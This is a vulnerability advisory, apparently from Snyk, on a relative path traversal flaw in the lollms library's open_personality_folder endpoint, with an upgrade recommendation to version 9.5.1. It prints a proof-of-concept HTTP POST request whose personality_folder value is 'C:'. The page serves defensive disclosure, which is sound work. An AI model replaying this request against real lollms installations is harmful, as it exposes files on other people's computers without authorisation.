Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Relative Path Traversal vulnerabilities in an interactive lesson.
Start learningUpgrade lollms
to version 9.5.1 or higher.
lollms is a python library for AI personality definition
Affected versions of this package are vulnerable to Relative Path Traversal due to improper sanitization of the personality_folder
parameter. An attacker can read any folder in the personality_folder
on the victim's computer by exploiting the ability to traverse directories and access arbitrary files through the open_personality_folder
endpoint.
POST /open_personality_folder HTTP/1.1
Host: localhost:9600
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 69
Origin: http://localhost:9600
Connection: keep-alive
Referer: http://localhost:9600/settings/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"client_id":"lv_imM87gAzRhpylAAAB","personality_folder":"C:"}